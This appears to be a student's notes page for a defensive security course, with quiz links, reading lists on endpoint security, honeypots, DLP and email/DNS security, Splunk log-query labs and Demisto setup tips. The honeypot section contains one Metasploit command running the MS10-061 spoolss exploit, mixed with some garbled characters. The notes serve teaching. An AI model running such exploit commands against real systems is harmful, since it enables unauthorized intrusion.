Kahoots

• Endpoint https://kahoot.it/challenge/?quiz-id=7e1ae79b-0fe7-4b3f-9006-c7f97e04b828&single-player=true
• Honeypot - https://kahoot.it/challenge/?quiz-id=1068ab51-9a3a-41de-b7c9-2c0add15d0d9&single-player=true
• DLP - https://kahoot.it/challenge/?quiz-id=16c30df7-b398-4516-ad2c-428cc746c0da&single-player=true
• Mail Security - https://kahoot.it/challenge/?quiz-id=04fb7109-9817-414f-ada2-ed517d2068a6&single-player=true
• SEIM Intro - https://kahoot.it/challenge/?quiz-id=b9224110-8cfd-4920-befb-6e021185e98c&single-player=true
• Advanced SEIM - https://kahoot.it/challenge/?quiz-id=9835867a-642c-4379-899b-7290705482ed&single-player=true
• SOAR - https://kahoot.it/challenge/?quiz-id=89a18c42-54cc-45b8-8b22-e3a8bd00c6ac&single-player=true
• Physical Security - https://kahoot.it/challenge/?quiz-id=e5e1946c-ad30-46b5-84e5-d4222fbc722c&single-player=true
• Final Exam Review: https://kahoot.it/challenge/?quiz-id=981cba5e-8473-431f-8d37-bed51f30b6e7&single-player=true

Windows 10 ova

• Download a Windows 10 virtual machine - Windows app development (microsoft.com)

EndPoint Security

• What is an Endpoint Device? | Barracuda Networks
• Microsoft Defender Antivirus | Microsoft Docs
• HIDS vs Antivirus: How Do They Compare?
• What is Data Loss Prevention? DLP Security Strategies, Benefits Explained
• 2021 Email Server Security Best Practices
• Understanding DEP as a mitigation technology part 1 – Microsoft Security Response Center
• Comparison of antivirus software - Wikipedia
• What is Heuristic Analysis? | Kaspersky
• 2021 UEBA Overview: What is User Entity Behavior Analytics?
• 2021 Malware Analysis Tools for Threat Hunting
• Get the Virtual Appliance - REMnux Documentation
• How Hackers Combat and Bypass Antivirus Systems | Kaspersky
• What Is Fileless Malware? | McAfee
• What is a Stealth Virus? — Definition by Techslang
• What is Endpoint Detection and Response? EDR Security Overview
• YARA - The pattern matching swiss knife for malware researchers (virustotal.github.io)
• cloudsecuritylabs/Phishing.Database (github.com)

HoneyPots

• Introduction — dionaea 0.11.0 documentation

• Features - Suricata

• PowerPoint Presentation (hhs.gov)

• Cowrie Honeypot on Ubuntu (formerly Kippo) | HackerTarget.com

• Setting up dionaea & cowrie with mhn

• Honeypots CERT Exercise Handbook (europa.eu)

• How to setup malware honeypot (V2) | Sample Collection • Adlice Software

  sudo lsof -i -P -n | grep LISTENooo]u7 msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST ; set LHOST ; set LPORT 4444; exploit; exit"

Data Loss Prevention

• LAB 1: World’s Biggest Data Breaches & Hacks — Information is Beautiful
• Steganography: Steganography Demo (vu.nl)
• Regex Lab: Learn Regex: A Beginner's Guide - SitePoint
• Regex: Test Mühendisliğine Giriş Eğitimi - Bölüm 1 (slideshare.net)
• Cert username: dlpuser/OpenDLP
• Digital watermark
• ReGex q
• CISCO ESA - DLP
• Microsoft 365 -> DLP is included -> could use Regulations to apply DLP rules
• Host Based DLP
• Network Based DLP
• What is a Hashed Email and Why Should Marketers Care? (privy.com)
• Mobile Advertising IDs, explained | BRIDGE (thebridgecorp.com)
• DNS tunneling (cisco.com)
• https://www.spirion.com/products/sensitive-data-manager/
• https://mydlp.com/
• http://truecrypt.sourceforge.net/
• Ashley Madison data breach - Wikipedia
• sonyhack.pdf (bu.edu)
• Lessons learned: The Capital One breach
• The Target Breach (bucks.edu)
• Sample Addresses! (summet.com)
• Learn Regex: A Beginner's Guide - SitePoint

Chapter 4: Mail Security

• https://howto.lintel.in/domain-registry-vs-registrar-vs-registrant/
• https://www.nccoe.nist.gov/sites/default/files/library/sp1800/dns-secure-email-nist-sp1800-6b.pdf
• Netstat -tulnp
• Sending messages: SMTP
• Receiving messages: IMAP, POP3
• MAIL from
• RCPT to
• Try out in class:
• https://mxtoolbox.com/MXLookup.aspx - Try out with Yahoo!
• https://dmarcian.com/domain-checker/?domain=yahoo.com
• Mail Security Products on Azure marketplace
• POP3 - 110, POP3 encrypted - 995
• IMAP - 143, IMAP encrypted - 993
• Domain-Based Message Authentication Reporting and Conformance
• POP, IMAP, and SMTP settings - Office Support (microsoft.com)
• ARP vs DNS (IP-MAC, IP-Domain name) (https://www.geeksforgeeks.org/difference-between-arp-and-rarp/ )
• Zone transfer - I have details of network components, DHCP Server, Mail Server etc
• DNS Poisoning
• What happens if an attacker modifies the c:\Windows\ProgramFiles\DNS\hosts file?
• Can you only assign domain name and no IP address?
• Email reputation system - don’t be blacklisted! VT.EDU!
• DNS responses are usually not authenticated!!! Unless you have DNSSEC
• How do you protect the HOST file? Read only, IDS, FIM
• You want multiple names to one server → CNAME
• Hostname to Ipv6 address
• Reverse look up → IP to DNS -->PTR
• Where do you store DKIM/SPF data? DNS txt field
• SPF is getting outdated
• For web server information, what record to use? SRV
• SPLIT DNS
• What is a return path address?
• A Complete List of SMTP Commands and What They are Used For - Tech Spirited
• SMTP Commands: all you need to know (serversmtp.com)
• POP = Post Office Protocol
• HowTo: Retrieve Email from a POP3 Server using the Command Line - ShellHacks
• https://o365info.com/how-to-simulate-e-mail-spoof-attack-part-11-of-12/

Advances SIEM:

• sourcetype="snort" AND 8.8.8.8

Lab1 - Log Queries:

• source="/var/log/auth.log"
• source="/var/log/*"
• source="/var/log/auth.log" authentication failure
• source="/var/log/auth.log" authentication failure user=student

Lab 2: Log parsing - extracting fields

• source="/var/log/apache2/access.log"
• status_code = 404

Lab3: Search Operators

• host IN ("studentub" , "DESKTOP-0UMTA4K")
• source = "/var/log/apache2/access.log" AND (status_code=200 OR status_code=404)
• source = "/var/log/apache2/access.log" AND status_code=200
• source = "/var/log/apache2/access.log" NOT request_url = "/random"

Lab4: Advanced Queries

• source = "/var/log/auth.log" authentication failure | stats count as FailedLoginsCount by user

• Try visualization - column chart, pie chart

• source = "/var/log/auth.log" authentication failure | stats count as FailedLoginsCount by user | search FailedLoginsCount > 2

• ( just try su testlog, provide wrong passwd for 4-5 times)

  sudo curl -ku 'student:[[email protected]]' https://localhost:8089/servicesNS/nobody/TA-Demisto/configs/conf-demistosetup/demistoenv/ -d VALIDATE_SSL=false

Installing Demisto

• just enable a bridge adapter to VM to have a direct connection to the internet. NOT VIA PFSENSE. Lab getting stuck at demisto/stix docker pull.
• https://localhost:8443/#/login - Demisto UI!!

Extra links

• https://docs.splunk.com/Documentation/Splunk/9.0.3/Search/Usingthesearchassistant
• NoSQL: https://www.mongodb.com/nosql-explained
• https://www.couchbase.com/resources/why-nosql/